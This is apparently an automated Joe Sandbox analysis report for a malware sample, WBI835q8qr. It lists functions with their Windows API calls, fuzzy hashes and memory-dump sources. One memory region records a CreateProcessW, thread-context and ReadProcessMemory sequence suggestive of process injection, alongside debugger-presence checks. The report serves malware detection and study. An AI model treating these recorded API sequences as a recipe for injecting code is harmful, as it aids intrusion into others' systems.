Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bbe13315e0cffdc838e5398882eda443274b14019c4444d6e296c197be2cd54b
Instruction ID: efbb0ff4e139c2d0a9f6e372bf835b639c60b491bc5fcb10020484798c365742
Opcode Fuzzy Hash: bbe13315e0cffdc838e5398882eda443274b14019c4444d6e296c197be2cd54b
Instruction Fuzzy Hash: 9C41E2719482059BCB10FFA9D8899AAB7E8EF49304F3444E9E28997392DF34DD05DB60

Function 00B27A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B27AAB
_memmove.LIBCMT ref: 00B27B16

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 843330d5c5f4a9c6b6d17f9acddccf00e61322bbcbb53b6972e03912422a30f5
Instruction ID: 13ff36734b182a1cb88bdfd9c4f869c32f02b53501e6a0ef4b22153e672b2cf3
Opcode Fuzzy Hash: 843330d5c5f4a9c6b6d17f9acddccf00e61322bbcbb53b6972e03912422a30f5
Instruction Fuzzy Hash: 5E31C2B1644616AFC704DF68D8D1E69B3E9FF4932071486A9E91DCB391EF30E920CB94

Function 00B247D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B24834

Part of subcall function 00B4336C: __lock.LIBCMT ref: 00B43372
Part of subcall function 00B4336C: DecodePointer.KERNEL32(00000001,?,00B24849,00B77C74), ref: 00B4337E
Part of subcall function 00B4336C: EncodePointer.KERNEL32(?,?,00B24849,00B77C74), ref: 00B43389

Part of subcall function 00B248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B24915
Part of subcall function 00B248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B2492A

Part of subcall function 00B23B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B23B68
Part of subcall function 00B23B3A: IsDebuggerPresent.KERNEL32 ref: 00B23B7A
Part of subcall function 00B23B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BE52F8,00BE52E0,?,?), ref: 00B23BEB
Part of subcall function 00B23B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B23C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B24874

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: f1b27f8adc74afcf7d7513c0ccd503354fa30303cee7b1f366d4ab575901de4a
Instruction ID: dc4814b1e039c83c47924d99ec8a7196014b652bda8287cacea799b51c128e04
Opcode Fuzzy Hash: f1b27f8adc74afcf7d7513c0ccd503354fa30303cee7b1f366d4ab575901de4a
Instruction Fuzzy Hash: 1711DF718083919FC710DF68E88590ABFE8EF99790F10465EF1488B2B1DF708A44CB82

Function 00B40DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4571C: __FF_MSGBANNER.LIBCMT ref: 00B45733
Part of subcall function 00B4571C: __NMSG_WRITE.LIBCMT ref: 00B4573A
Part of subcall function 00B4571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,00000000,?,?,?,00B40DD3,?), ref: 00B4575F

std::exception::exception.LIBCMT ref: 00B40DEC
__CxxThrowException@8.LIBCMT ref: 00B40E01

Part of subcall function 00B4859B: RaiseException.KERNEL32(?,?,?,00BD9E78,00000000,?,?,?,?,00B40E06,?,00BD9E78,?,00000001), ref: 00B485F0

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 7947c2435083a03f17098cedf1d860274afcc1dda35a7d93c84632329ff2274a
Instruction ID: e5ac623f9f7fd698549f027a749d484d9475f9b9f29518623a3a7f0f5d924bfc
Opcode Fuzzy Hash: 7947c2435083a03f17098cedf1d860274afcc1dda35a7d93c84632329ff2274a
Instruction Fuzzy Hash: A2F0A43291021967DB10BFA8EC429EEBBECDF05311F1008FAFE0496291DFB09B54A2D1

Function 00B453A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

__lock_file.LIBCMT ref: 00B453EB

Part of subcall function 00B46C11: __lock.LIBCMT ref: 00B46C34

__fclose_nolock.LIBCMT ref: 00B453F6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 64487127b53b683b8d3c7728c08cc8e604893388d1b103f4abd6fd7f4adb2a6f
Instruction ID: 0f85602c4cddc5f1742a7334a151958197439aa2d552aea64e1a0c6f41017235
Opcode Fuzzy Hash: 64487127b53b683b8d3c7728c08cc8e604893388d1b103f4abd6fd7f4adb2a6f
Instruction Fuzzy Hash: 17F09071801E049BDB20AF6598467AD6BE0AF41374F2082C9A465AB1C2CBBC8B45BB56

Function 00D5D85D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D5E01B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D5E0B1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5E0D3

Memory Dump Source

Source File: 00000000.00000002.1429359956.0000000000D5C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D5C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5c000_WBI835q8qr.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: d39201df5e74451d3ca5abe985a36b56abb755a7bf6ad6fc271da1969c454e20
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 9412EC20E24658C6EB24DF64D8507DEB232EF68301F1090E9950DEB7A4E77A4F85CF5A

Function 00B2750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B275EA

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: db7db87ae97476753c93eadf8842eb12e1889b54b408a362942c48e3f86dd011
Instruction ID: 8024e9e46fc56922d93893a6dcfdb33209d3d8933ab2c1a486fef1aa9f948345
Opcode Fuzzy Hash: db7db87ae97476753c93eadf8842eb12e1889b54b408a362942c48e3f86dd011
Instruction Fuzzy Hash: 6F31A375648A229FC714DF19E480962F7E0FF19310714C5A9E98E8B795EB30E891DB88

Function 00B40C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00B40CB7

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: db910ea6f836b67a148624c07863f6720ea76644da4059b16325a6c928b78abe
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6C319070A10105DBC718EF58D4C4A69F7E6FB99300B6486E5E90ACB356D631EED1EBC0

Function 00B5FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00B5FCB7

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ee8dbf6673874acb482dd4d0bbff5832b17c1506aae57ad5eb6249f074cb66eb
Instruction ID: b1781c3fd8b0423f7e9a48bc3e1528b4e23b78cfcbf5fb02c77e0ab434b189e1
Opcode Fuzzy Hash: ee8dbf6673874acb482dd4d0bbff5832b17c1506aae57ad5eb6249f074cb66eb
Instruction Fuzzy Hash: EE4115745083519FDB24DF14D494B2ABBE0FF49314F0988ACE9998B362C731EC45CB52

Function 00B24DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B24BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B24BEF

Part of subcall function 00B4525B: __wfsopen.LIBCMT ref: 00B45266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B24E0F

Part of subcall function 00B24B6A: FreeLibrary.KERNEL32(00000000), ref: 00B24BA4

Part of subcall function 00B24C70: _memmove.LIBCMT ref: 00B24CBA

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 8f6490ffb6e3d3a8f2bbb9d93d61cd18cd887845a60c2b18f5c8bf1f2115d8a2
Instruction ID: 2de00e58e4f70b15a5ee5a7314cc23016c85df85066ebfc48f95fd2160bd10e5
Opcode Fuzzy Hash: 8f6490ffb6e3d3a8f2bbb9d93d61cd18cd887845a60c2b18f5c8bf1f2115d8a2
Instruction Fuzzy Hash: 7111E731600216ABDF24BF70D816FAD77E8EF44710F1088A9F949A7581DB719A059B50

Function 00B5FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00B5FD91

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 83bb604859a25d129149be3a142bbc5d084e570a99badbaf2b795d8c6319e991
Instruction ID: 3bcd217bbde46ea1bdc8f5479f9eeaacaf74ea60ac89ceea112d50e366769ac9
Opcode Fuzzy Hash: 83bb604859a25d129149be3a142bbc5d084e570a99badbaf2b795d8c6319e991
Instruction Fuzzy Hash: 50211374918311DFCB14DF64D484A6ABBE1BF88314F0589ACF98A57722D731E815CB93

Function 00B4072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B407B0

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 9c23b14a4680c8fa6484fb8fd31d9fe01c6dcce11f6b087c8f51218ce6361588
Instruction ID: 3e2e919638ad1c2d0113bddfb7641e0291b949913feb2b8ca5961c5adf66cacb
Opcode Fuzzy Hash: 9c23b14a4680c8fa6484fb8fd31d9fe01c6dcce11f6b087c8f51218ce6361588
Instruction Fuzzy Hash: 56F0963A651214AFE3119658EC01BFDB7DDABDA761B184166FE88D3B80C9206C164AE1

Function 00B44863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00B448A6

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 681e7a790d435d56325f15dff924fdab12108132dd5a394d8227363270e3f9ea
Instruction ID: 4bd14d95c83a41712744239ff118eb82f99427bc263b4c4e1d59b6852c74e333
Opcode Fuzzy Hash: 681e7a790d435d56325f15dff924fdab12108132dd5a394d8227363270e3f9ea
Instruction Fuzzy Hash: 47F0CD31901609EBDF11AFB48C067EE37E0EF01325F158598F424AA192DBB88B61FF52

Function 00B24E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00BE52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B24E7E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 81669e7bc95fe1ead211f29e13c642bb6231c85a719c311e9cad473d1b769859
Instruction ID: ce299273cadcff0170f7cb73123dc101913fa3b5e55974cda38bfee0ba3bf3e3
Opcode Fuzzy Hash: 81669e7bc95fe1ead211f29e13c642bb6231c85a719c311e9cad473d1b769859
Instruction Fuzzy Hash: A7F03071501721CFDB38AF64E4D4816B7E1FF1432531189BEE1DB82A10C7319840DF40

Function 00B40791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B407B0

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b0d1108db0ac18151ee0a999931d37fdd87e427d0a8edaebee5efe89aa86b4a6
Instruction ID: 8ae70a8b30c030beb4e6d743a8e03f896f959d98b6e5f261dd8f3b873d303401
Opcode Fuzzy Hash: b0d1108db0ac18151ee0a999931d37fdd87e427d0a8edaebee5efe89aa86b4a6
Instruction Fuzzy Hash: 75E086369452285BC720A6989C0AFEA77DDDB896A1F0441F5FC0CD7214DD609C808690

Function 00B4525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00B45266

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 77e93a4f1f85eae4816eabefddc2f4e0839c2435df04e91b07c533ce7e21b8ac
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 9FB0927644060C77CE112A82EC02A493B5D9B41764F408061FB0C18162A6B3A664AA89

Function 00D5E860 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00D5E871

Memory Dump Source

Source File: 00000000.00000002.1429359956.0000000000D5C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D5C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5c000_WBI835q8qr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 73b06118792de02c58a4170002a9ece38bbf6680c4d77b425f5d7a1489454efe
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 68E0E67494410DDFDB00EFB8D54969E7FF4EF04302F100661FD01D2280D6309E508A72

Non-executed Functions

Function 00BACABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BACB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BACB95
GetWindowLongW.USER32(?,000000F0), ref: 00BACBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BACC00
SendMessageW.USER32 ref: 00BACC29
_wcsncpy.LIBCMT ref: 00BACC95
GetKeyState.USER32(00000011), ref: 00BACCB6
GetKeyState.USER32(00000009), ref: 00BACCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BACCD9
GetKeyState.USER32(00000010), ref: 00BACCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BACD0C
SendMessageW.USER32 ref: 00BACD33
SendMessageW.USER32(?,00001030,?,00BAB348), ref: 00BACE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BACE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BACE60
SetCapture.USER32(?), ref: 00BACE69
ClientToScreen.USER32(?,?), ref: 00BACECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BACEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BACEF5
ReleaseCapture.USER32 ref: 00BACF00
GetCursorPos.USER32(?), ref: 00BACF3A
ScreenToClient.USER32(?,?), ref: 00BACF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00BACFA3
SendMessageW.USER32 ref: 00BACFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00BAD00E
SendMessageW.USER32 ref: 00BAD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BAD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BAD06D
GetCursorPos.USER32(?), ref: 00BAD08D
ScreenToClient.USER32(?,?), ref: 00BAD09A
GetParent.USER32(?), ref: 00BAD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00BAD123
SendMessageW.USER32 ref: 00BAD154
ClientToScreen.USER32(?,?), ref: 00BAD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BAD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00BAD20C
SendMessageW.USER32 ref: 00BAD22F
ClientToScreen.USER32(?,?), ref: 00BAD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BAD2B5

Part of subcall function 00B225DB: GetWindowLongW.USER32(?,000000EB), ref: 00B225EC

GetWindowLongW.USER32(?,000000F0), ref: 00BAD351

Strings

F, xrefs: 00BAD235
@GUI_DRAGID, xrefs: 00BACE9C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: ffa0867868ac1d3e2090cdd4616003917ca6c9dae1bab724107598ae24432f86
Instruction ID: 295133611e6e6ef5e3f5ab27cda7b14e577ff38be903824fbd80fe65b62317a0
Opcode Fuzzy Hash: ffa0867868ac1d3e2090cdd4616003917ca6c9dae1bab724107598ae24432f86
Instruction Fuzzy Hash: 9242BE34208345AFDB24CF68C885EAABFE5FF4A310F140599F5A5872B0CB32D855DBA1

